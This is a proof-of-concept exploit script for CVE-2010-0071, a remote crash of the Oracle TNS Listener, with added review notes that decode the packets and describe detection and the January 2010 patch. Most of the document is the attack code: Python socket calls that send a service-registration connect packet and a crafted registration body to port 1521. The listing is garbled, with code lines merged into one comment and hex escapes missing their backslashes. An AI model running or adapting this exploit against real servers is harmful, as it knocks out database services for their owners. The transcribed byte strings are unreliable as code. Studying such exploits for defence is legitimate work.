
CVE-2010-0071.py.txt

Posted on 22 January 2010

# NOTE(review): proof-of-concept for CVE-2010-0071, a remote denial of service
# against the Oracle TNS Listener (TCP 1521). Per the author's trace below, the
# listener's nsglvcrt() routine requests a ~69 MB block (malloc(0x4222fc5)) and
# then memcpy()s 0x4222fc4 bytes from address 0 - a read from an unmapped
# source, which is presumably the actual fault. The first packet's connect
# string decodes to "(CONNECT_DATA=(COMMAND=service_register_NSGR))", i.e. a
# service-registration request, consistent with the note that nsglvcrt() is
# involved in new service creation; the second packet is a hand-built
# registration body (instance name "orcl", "(HOST=win2003)", "DEDICATED" and a
# BEQ ADDRESS descriptor are readable in it). Affected and unaffected builds
# are listed in the header; the fix is Oracle's CPUjan2010. For defenders:
# unpatched listeners reachable from untrusted networks are exposed, and an
# unsolicited service_register_NSGR connect from a host that is not one of
# your database instances is the traffic to look for. The listing as pasted is
# kept byte-for-byte and is not runnable as shown: the entire line below is a
# single comment (the imports, connect() and first send() were swallowed into
# it) and the byte strings have lost their escape prefixes in transcription.
# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash # While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt # to allocate huge memory block and copy *something* to it. # TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95)) # TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020 # TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab)) # (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched) # If I correct, nsglvcrt() function is involved in new service creation. # Successfully crashed: # Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied # Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied # Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied # Oracle RDBMS 10.2.0.2 Linux x86 # Not crashed: # Oracle RDBMS 11.2 Linux x86 # Vulnerability discovered by Dennis Yurichev <dennis@conus.info> # Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0): # http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM) sockobj.connect ((argv[1], 1521)) sockobj.send( "x00x68x00x00x01x00x00x00" "x01x3Ax01x2Cx00x00x20x00" "x7FxFFxC6x0Ex00x00x01x00" "x00x2Ex00x3Ax00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x00x28x43x4Fx4Ex4Ex45" "x43x54x5Fx44x41x54x41x3D" "x28x43x4Fx4Dx4Dx41x4Ex44" "x3Dx73x65x72x76x69x63x65" "x5Fx72x65x67x69x73x74x65" "x72x5Fx4Ex53x47x52x29x29" ) data=sockobj.recv(102400) sockobj.send( "x02xDEx00x00x06x00x00x00" "x00x00x00x00x02xD4x20x08" "xFFx03x01x00x12x34x34x34" "x34x34x78x10x10x32x10x32" "x10x32x10x32x10x32x54x76" "x00x78x10x32x54x76x44x00" "x00x80x02x00x00x00x00x04" "x00x00x70xE4xA5x09x90x00" "x23x00x00x00x42x45x43x37" "x36x43x32x43x43x31x33x36" "x2Dx35x46x39x46x2Dx45x30" "x33x34x2Dx30x30x30x33x42" "x41x31x33x37x34x42x33x03" "x00x65x00x01x00x01x00x00" 
# NOTE(review): remainder of the second (registration) packet, in 8-byte
# chunks. The readable tail is the instance's dispatcher description:
# "(ADDRESS=(PROTOCOL=BEQ)(PROGRAM=...\bin\oracle.exe)(ARGV0=oracleorcl)
# (ARGS='(LOCAL=NO)'))" followed by "LOCAL SERVER"; the surrounding binary
# fields are what the author's note says nsglvcrt() mishandles - which field
# drives the 0x4222fc4 copy length is not stated on this page.
"x00x00x00x00x00x00x64x02" "x00x80x05x00x00x00x00x04" "x00x00x00x00x00x00x01x00" "x00x00x10x00x00x00x02x00" "x00x00x84xC3xCCx07x01x00" "x00x00x84x2FxA6x09x00x00" "x00x00x44xA5xA2x09x25x98" "x18xE9x28x50x4Fx28xBBxAC" "x15x56x8Ex68x1Dx6Dx05x00" "x00x00xFCxA9x36x22x0Fx00" "x00x00x60x30xA6x09x0Ax00" "x00x00x64x00x00x00x00x00" "x00x00xAAx00x00x00x00x01" "x00x00x17x00x00x00x78xC3" "xCCx07x6Fx72x63x6Cx00x28" "x48x4Fx53x54x3Dx77x69x6E" "x32x30x30x33x29x00x01x00" "x00x00x58x00x00x00x01x00" "x00x00x50xC5x2Fx22x02x00" "x00x00x34xC5x2Fx22x00x00" "x00x00x9CxC5xCCx07x6Fx72" "x63x6Cx5Fx58x50x54x00x09" "x00x00x00x50xC5x2Fx22x04" "x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x34" "xC5xCCx07x6Fx72x63x6Cx5F" "x58x50x54x00x01x00x00x00" "x05x00x00x00x01x00x00x00" "x84xC5x2Fx22x02x00x00x00" "x68xC5x2Fx22x00x00x00x00" "xA4xA5xA2x09x6Fx72x63x6C" "x00x05x00x00x00x84xC5x2F" "x22x04x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00xFCxC4xCCx07x6Fx72x63" "x6Cx00x01x00x00x00x10x00" "x00x00x02x00x00x00xBCxC3" "xCCx07x04x00x00x00xB0x2F" "xA6x09x00x00x00x00x00x00" "x00x00x89xC0xB1xC3x08x1D" "x46x6DxB6xCFxD1xDDx2CxA7" "x66x6Dx0Ax00x00x00x78x2B" "xBCx04x7Fx00x00x00x64xA7" "xA2x09x0Dx00x00x00x20x2C" "xBCx04x11x00x00x00x95x00" "x00x00x02x20x00x80x03x00" "x00x00x98xC5x2Fx22x00x00" "x00x00x00x00x00x00x0Ax00" "x00x00xB0xC3xCCx07x44x45" "x44x49x43x41x54x45x44x00" "x28x41x44x44x52x45x53x53" "x3Dx28x50x52x4Fx54x4Fx43" "x4Fx4Cx3Dx42x45x51x29x28" "x50x52x4Fx47x52x41x4Dx3D" "x43x3Ax5Cx61x70x70x5Cx41" "x64x6Dx69x6Ex69x73x74x72" "x61x74x6Fx72x5Cx70x72x6F" "x64x75x63x74x5Cx31x31x2E" "x31x2Ex30x5Cx64x62x5Fx31" "x5Cx62x69x6Ex5Cx6Fx72x61" "x63x6Cx65x2Ex65x78x65x29" "x28x41x52x47x56x30x3Dx6F" "x72x61x63x6Cx65x6Fx72x63" "x6Cx29x28x41x52x47x53x3D" "x27x28x4Cx4Fx43x41x4Cx3D" "x4Ex4Fx29x27x29x29x00x4C" "x4Fx43x41x4Cx20x53x45x52" "x56x45x52x00x68xC5x2Fx22" "x34xC5x2Fx22x00x00x00x00" "x05x00x00x00x84xC5x2Fx22" "x04x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "xFCxC4xCCx07x6Fx72x63x6C" "x00x09x00x00x00x50xC5x2F" 
"x22x04x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x34xC5xCCx07x6Fx72x63" "x6Cx5Fx58x50x54x00" ) sockobj.close()

 
